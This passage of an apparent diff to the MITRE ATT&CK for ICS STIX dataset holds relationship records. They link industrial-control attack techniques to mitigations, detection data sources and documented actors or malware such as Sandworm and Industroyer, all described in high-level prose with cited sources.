2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0491ef92-2941-4841-9fe6-2e1809788b52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.210Z", + "relationship_type": "mitigates", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6eaf727c-fec3-4e63-8852-eee27c44d596", + "created": "2022-09-27T15:23:19.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:47:06.144Z", + "description": "Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.", + "relationship_type": 
"detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9b825e77-2b18-4bc8-8e1d-5f645d570dca", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-11-23T21:06:25.384Z", + "description": "(Citation: Dragos Xenotime 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c78f497f-01c3-4efb-aa74-92b700b9c02b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.186Z", + "relationship_type": "mitigates", + "description": "When at rest, project files should be encrypted to prevent unauthorized changes. 
(Citation: National Institute of Standards and Technology April 2013)\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ade12d27-13bb-4ebf-be08-7039cf699682", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--be950e87-80ac-49ea-810a-553c7f72151b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + 
"modified": "2022-05-06T17:47:24.073Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8af89a9b-3e95-45f4-a51d-223b1c82db9c", + "created": "2022-09-26T16:50:56.298Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:50:56.298Z", + "description": "Monitor for a loss of network communications, which may indicate a device has been shutdown or restarted. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1a40cec9-47c3-404e-b039-b7ae83ffaf68", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Ensure all browsers and plugins are kept updated to help prevent the exploit phase of this technique. 
Use modern browsers with security features enabled.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--83c29179-4805-403a-acf5-5151c4d2e556", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:27:02.814Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s OPC and IEC 61850 protocol modules include the ability to send stVal requests to read the status of operational variables. 
(Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ccab2b58-7c47-45fe-bdd3-3444fb53760c", + "created": "2022-09-27T15:34:07.320Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:34:07.320Z", + "description": "Monitor DLL file events, specifically creation of these binary files as well as the loading of DLLs into processes associated with remote graphical connections, such as RDP and VNC. [Remote Services](https://attack.mitre.org/techniques/T0886) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f804c9f-3b65-47eb-89f3-83edd0422fdc", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:34:32.554Z", + "description": "Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": 
"x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7a79ff35-319a-4e7d-b8c7-72f0bb0f8978", + "created": "2022-09-26T14:29:33.111Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:29:33.111Z", + "description": "Various techniques enable spoofing a reporting message. Monitor for LLMNR/NBT-NS poisoning via new services/daemons which may be used to enable this technique. For added context on adversary procedures and background see [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c726e8af-9b98-4ce9-b8f4-3e82e59d5374", + "created": "2022-09-26T14:35:27.430Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:35:27.430Z", + "description": "Monitor for new or unexpected connections to controllers, which could indicate an Unauthorized Command Message being sent via [Rogue Master](https://attack.mitre.org/techniques/T0848).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": 
"attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3618a010-b94b-4974-b1be-7630d5c853c1", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Robert Falcone, Bryan Lee May 2016", + "description": "Robert Falcone, Bryan Lee 2016, May 26 The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor Retrieved. 2019/11/19 ", + "url": "https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:31:19.923Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) used spearphishing emails with malicious Microsoft Excel spreadsheet attachments. 
(Citation: Robert Falcone, Bryan Lee May 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f3810d69-0eff-4d62-bdf1-2870cf676bba", + "created": "2023-03-30T14:11:33.618Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:11:33.618Z", + "description": "Monitor for device credential changes observable in automation or management network protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bbf297d3-0c3c-44be-b780-332bac17b0ba", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.222Z", + "relationship_type": "mitigates", + "description": "Devices should authenticate all messages between master and outstation assets.\n", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--77821dbb-367e-455f-bcae-b87412e88f1b", + "created": "2022-09-26T16:56:53.939Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:56:53.940Z", + "description": "Monitor asset management systems for device configuration changes which can be used to understand expected parameter settings.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eecca3e7-4db5-40d4-b04c-13f84701acb3", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:52.947Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. 
Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a6479493-6154-408f-90df-9d2f3ae352d1", + "created": "2023-03-31T17:46:01.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. 
Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:06:53.070Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used valid accounts to laterally move through VPN connections and dual-homed systems.(Citation: Dragos Crashoverride 2018)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--139bb9e7-e5fd-4366-b2e6-4f74a73ec984", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--57e8711a-9aae-4a22-94d4-f4c8a3a8f141", + "created": "2023-03-31T18:12:35.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET 
Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:07:29.299Z", + "description": "Within the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Industroyer](https://attack.mitre.org/software/S0604) was used to target and disrupt the Ukrainian power grid substation components.(Citation: Dragos Crashoverride 2018)(Citation: ESET Industroyer)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1c3d966a-5995-48ed-919d-25b972010fe9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.180Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. 
Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9f25cdae-7d0f-49cd-acaf-481f71195ae5", + "created": "2022-09-27T16:38:57.931Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:38:57.931Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. 
Software exploits may not always succeed or may cause the exploited process to become unstable or crash.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--206cc4c8-797e-427b-86f1-4c81df391c6e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.224Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ec105f62-2552-41fa-8b07-619dc1bf9b19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.177Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. 
Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c22acaab-baa4-45b0-9c4b-9330715e5455", + "created": "2022-10-13T21:18:17.775Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:26:03.133Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors utilized an operator HMI to manipulate process control setpoint values far beyond normal operating levels.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--70a9010c-6943-4274-b854-50901c3e5a0e", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:23:29.885Z", + "description": "Monitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c7a1037f-cb28-40d4-be19-78e2f0e0aa68", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. 
